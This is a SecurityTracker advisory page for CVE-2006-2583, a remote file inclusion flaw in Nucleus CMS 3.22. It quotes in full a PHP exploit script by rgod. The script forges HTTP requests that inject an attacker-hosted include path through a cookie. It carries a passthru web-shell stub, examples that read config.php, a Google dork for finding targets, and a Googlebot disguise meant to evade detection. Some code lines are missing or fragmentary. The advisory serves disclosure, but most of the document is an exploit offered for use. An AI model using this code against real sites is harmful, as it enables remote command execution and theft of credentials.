Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Forum/Board/Portal)  >   Nucleus Vendors:
Nucleus Include File Bug in 'PLUGINADMIN.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016146
SecurityTracker URL:
CVE Reference:   CVE-2006-2583   (Links to External Site)
Updated:  Sep 5 2009
Original Entry Date:  May 24 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.22
Description:   rgod reported a vulnerability in Nucleus. A remote user can include and execute arbitrary code on the target system.

The 'nucleus/libs/PLUGINADMIN.php' script does not properly validate user-supplied input. If register_globals and allow_url_fopen are enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:


The original advisory is available at:

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  Nucleus CMS <= 3.22 arbitrary remote inclusion

#!/usr/bin/php -q -d short_open_tag=on
echo "Nucleus <= 3.22 arbitrary remote inclusion exploit\r\n";
echo "by rgod\r\n";
echo "site:\r\n\r\n";
echo "this is called the \"deadly eyes of Sun-tzu\"\r\n";
echo "dork: Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top\r\n\r\n";
works with:

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to Nucleus\r\n";
echo "location:  an arbitrary location with the code to include\r\n";
echo "cmd:       a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /nucleus/ cat ./../../config.php\r\n";
echo "php ".$argv[0]." localhost /nucleus/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n\r\n";
echo "note, you need this code in\r\n";
echo "<?php\r\n";
echo "if (get_magic_quotes_gpc()){\$_REQUEST[\"cmd\"]=stripslashes(\$_REQUEST[\"cmd\"]);}\r\n";
echo "ini_set(\"max_execution_time\",0);\r\n";
echo "echo \"*delim*\";\r\n";
echo "passthru(\$_REQUEST[\"cmd\"]);\r\n";
echo "echo \"*delim*\";\r\n";
echo "?>\r\n";

/* software site:

   i) vulnerable code in nucleus/libs/PLUGINADMIN.php at lines 21-49:

$aVarsToCheck = array('DIR_LIBS');
foreach ($aVarsToCheck as $varName)
	if (phpversion() >= '4.1.0')
		if (   isset($_GET[$varName])
			|| isset($_POST[$varName])
			|| isset($_COOKIE[$varName])
			|| isset($_ENV[$varName])
			|| isset($_SESSION[$varName])
			|| isset($_FILES[$varName])
			die('Sorry. An error occurred.');
	} else {
		if (   isset($HTTP_GET_VARS[$varName])
			|| isset($HTTP_POST_VARS[$varName])
			|| isset($HTTP_COOKIE_VARS[$varName])
			|| isset($HTTP_ENV_VARS[$varName])
			|| isset($HTTP_SESSION_VARS[$varName])
			|| isset($HTTP_POST_FILES[$varName])
			die('Sorry. An error occurred.');

include($DIR_LIBS . 'ADMIN.php');

so, if register_globals = On and allow_url_fopen = On, we have arbitrary remote inclusion, poc:


where on we have some php code in

also, if register_globals = On & magic_quotes_gpc = Off:



function quick_dump($string)
  for ($i=0; $i<=strlen($string)-1; $i++)
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 return $exa."\r\n".$result;
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    if (!$ock) {
      echo 'No response from proxy...';die;
  if ($proxy=='') {
    while (!feof($ock)) {
  else {
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  #echo "\r\n".$html;

if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
{die("Check the path, it must begin and end with a trailing slash\r\n");}
for ($i=4; $i<=$argc-1; $i++){
if (($temp<>"-p") and ($temp<>"-P"))
$cmd.=" ".$argv[$i];
if ($temp=="-p")
if ($temp=="-P")
if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}

$packet ="GET ".$p."nucleus/libs/PLUGINADMIN.php HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +\r\n";
$packet.="Host: ".$host."\r\n";
//through cookies, it's the same, maybe can bypass some ids...
$packet.="Cookie: GLOBALS[DIR_LIBS]=".$loc."; cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";

if (strstr($html,"*delim*"))
  echo "Exploit succeeded...";
//if you are here...
echo "Exploit failed...\r\n";

original url:


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC